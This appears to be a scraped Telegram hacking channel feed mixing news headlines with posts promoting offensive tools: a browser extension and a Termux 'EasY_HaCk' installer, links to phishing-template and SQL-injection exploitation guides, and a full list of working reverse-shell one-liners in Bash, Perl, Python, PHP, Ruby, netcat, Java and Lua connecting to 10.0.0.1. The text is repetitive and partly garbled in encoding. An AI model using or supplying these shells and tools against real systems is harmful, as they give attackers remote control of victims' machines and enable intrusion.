Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Operators of Revil ransomware threaten to upload photographs pertaining to cosmetic surgery.
#Malwares
#Malwares
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ALL FREE :
Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)
Shell Spawning (TTY Shell Spawning)
XSS Payloads
Basic SQLi payloads
Local file inclusion payloads (LFI)
Base64 Encoder / Decoder
Hash Generator (MD5, SHA1, SHA256, SHA512, SM3)
Useful Linux commands (Port Forwarding, SUID)
RSS Feed (Exploit DB, Cisco Security Advisories, CXSECURITY)
CVE Search Engine
Various method of data exfiltration and download from a remote
machine
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) install this extension in your browser: https://addons.mozilla.org/en-US/firefox/addon/hacktools/
2) switch on from extension manager
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ALL FREE :
Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)
Shell Spawning (TTY Shell Spawning)
XSS Payloads
Basic SQLi payloads
Local file inclusion payloads (LFI)
Base64 Encoder / Decoder
Hash Generator (MD5, SHA1, SHA256, SHA512, SM3)
Useful Linux commands (Port Forwarding, SUID)
RSS Feed (Exploit DB, Cisco Security Advisories, CXSECURITY)
CVE Search Engine
Various method of data exfiltration and download from a remote
machine
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) install this extension in your browser: https://addons.mozilla.org/en-US/firefox/addon/hacktools/
2) switch on from extension manager
β β β Uππ»βΊπ«Δπ¬πβ β β β
addons.mozilla.org
HackTools β Get this Extension for π¦ Firefox (en-US)
Download HackTools for Firefox. Hacktools, is a web extension facilitating your web application penetration tests, it includes cheat sheets as well as all the tools used during a test such as XSS payloads, Reverse shells to test your web application.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Financial institutions hurry to respond to the alarm of the FSA and illegal access to goods from the sales force.
#International
#International
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦{1}-Payload Generator
{2}- Merasploit-Framework installation
{3} Beef-Framework installation
{4} NGROK installation
{5} Network scanning using nmap
{6} WEB-HACKS
{7} PASSWORD CRACK
{8} Starting your web server
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg update
2) pkg upgrade
3) pkg install git
4) git clone https://github.com/sabri-zaki/EasY_HaCk
5) cd EasY_HaCk/
6) chmod +x install.sh
7) Type EasY-HaCk
8) choose option
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦{1}-Payload Generator
{2}- Merasploit-Framework installation
{3} Beef-Framework installation
{4} NGROK installation
{5} Network scanning using nmap
{6} WEB-HACKS
{7} PASSWORD CRACK
{8} Starting your web server
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg update
2) pkg upgrade
3) pkg install git
4) git clone https://github.com/sabri-zaki/EasY_HaCk
5) cd EasY_HaCk/
6) chmod +x install.sh
7) Type EasY-HaCk
8) choose option
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - sabri-zaki/EasY_HaCk: Hack the World using Termux
Hack the World using Termux. Contribute to sabri-zaki/EasY_HaCk development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
The leaker revealed new information that would be announced in 20222 for the foldable iPhone.
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
hacking is fun with this collections :
-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE:
www.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple
-Comprehensive Guide on Gobuster Tool:
https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/
--My Top 5 Web Hacking Tools:
https://medium.com/p/e15b3c1f21e8
-90-[technical] Pen-testing resources:
https://medium.com/p/cd01de9036ad
-File System Access on Webserver using Sqlmap:
http://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap
-kali-linux-cheatsheet:
https://github.com/NoorQureshi/kali-linux-cheatsheet
-Pentesting Cheatsheet:
https://anhtai.me/pentesting-cheatsheet/
-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd):
http://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa
-XSS Payload List - Cross Site Scripting Vulnerability Payload List:
https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html
-Analyzing CVE-2018-6376 β Joomla!, Second Order SQL Injection:
https://www.notsosecure.com/analyzing-cve-2018-6376/
-Exploiting Sql Injection with Nmap and Sqlmap:
http://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap
--awesome-malware-analysis:
https://github.com/rshipp/awesome-malware-analysis
β β β Uππ»βΊπ«Δπ¬πβ β β β
hacking is fun with this collections :
-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE:
www.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple
-Comprehensive Guide on Gobuster Tool:
https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/
--My Top 5 Web Hacking Tools:
https://medium.com/p/e15b3c1f21e8
-90-[technical] Pen-testing resources:
https://medium.com/p/cd01de9036ad
-File System Access on Webserver using Sqlmap:
http://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap
-kali-linux-cheatsheet:
https://github.com/NoorQureshi/kali-linux-cheatsheet
-Pentesting Cheatsheet:
https://anhtai.me/pentesting-cheatsheet/
-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd):
http://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa
-XSS Payload List - Cross Site Scripting Vulnerability Payload List:
https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html
-Analyzing CVE-2018-6376 β Joomla!, Second Order SQL Injection:
https://www.notsosecure.com/analyzing-cve-2018-6376/
-Exploiting Sql Injection with Nmap and Sqlmap:
http://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap
--awesome-malware-analysis:
https://github.com/rshipp/awesome-malware-analysis
β β β Uππ»βΊπ«Δπ¬πβ β β β
Hacking Articles
Comprehensive Guide on Gobuster Tool
Master Gobuster for web directory brute-forcing: Installation, usage, flags, and advanced scanning techniques for pentesters.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
Reverse shell method for multiple programming languages ββunder Linux l:
Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl version: perl -e'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p ,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i" );};
Python version: python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s. fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i "]);'
PHP version: php -r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby version: ruby ββ-rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)'
nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp /f
nc xxxx 8888|/bin/sh|nc xxxx 9999
java version: r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/ bin/sh -i <&3 >&3 2>&3');"
β β β Uππ»βΊπ«Δπ¬πβ β β β
Reverse shell method for multiple programming languages ββunder Linux l:
Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl version: perl -e'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p ,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i" );};
Python version: python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s. fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i "]);'
PHP version: php -r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby version: ruby ββ-rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)'
nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp /f
nc xxxx 8888|/bin/sh|nc xxxx 9999
java version: r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/ bin/sh -i <&3 >&3 2>&3');"
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
The AdDuplex study reveals that the Windows 10 20H2 edition utilization rate approaches 10%
#Analytiques
#Analytiques
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Launch a simple service via apache :
C.D.Luminate
https://github.com/cdluminate/withlinux
---START---
1. install apache2
sudo apt install apache2
then apache2 will autostart and set to start after boot.
sysv-rc-conf, or systemctl disable ... etc.
2. configure
cd /etc/apache2
consider to,
at port 8080, serve a file server rooted at /some/dir
-> default is /var/www for debian.
2.1 [optional] config apache2.conf
add this , or Include a file contained it, such as mysrvdir.conf
add ServerName such as
> ServerName localhost
2.2 config ports.conf
add
Listen 8080
or sth like
Listen [IPv6_addr]:8080
Listen 192.168.0.1:8080 -> to bind a ip addr
Listen *:8080 -> wildcard is supported
and comment other ports.
2.3 add a file to sites-enabled/
file contents
3. bind mount
mount --bind /dir/of/files/to/serve /some/dir
4. start apache
apachectl start
ref: apach.org
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Launch a simple service via apache :
C.D.Luminate
https://github.com/cdluminate/withlinux
---START---
1. install apache2
sudo apt install apache2
then apache2 will autostart and set to start after boot.
sysv-rc-conf, or systemctl disable ... etc.
2. configure
cd /etc/apache2
apache2.conf -> the main configure file.
`--ports.conf -> conf about ports.
consider to,
at port 8080, serve a file server rooted at /some/dir
-> default is /var/www for debian.
2.1 [optional] config apache2.conf
add this , or Include a file contained it, such as mysrvdir.conf
<Directory /some/dir>
Options None
AllowOverride None
Require all granted
</Directory>
add ServerName such as
> ServerName localhost
2.2 config ports.conf
add
Listen 8080
or sth like
Listen [IPv6_addr]:8080
Listen 192.168.0.1:8080 -> to bind a ip addr
Listen *:8080 -> wildcard is supported
and comment other ports.
2.3 add a file to sites-enabled/
file contents
<VirtualHost *:8080>
ServerAdmin root@localhost
DocumentRoot /some/dir
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
3. bind mount
mount --bind /dir/of/files/to/serve /some/dir
4. start apache
apachectl start
ref: apach.org
β β β Uππ»βΊπ«Δπ¬πβ β β β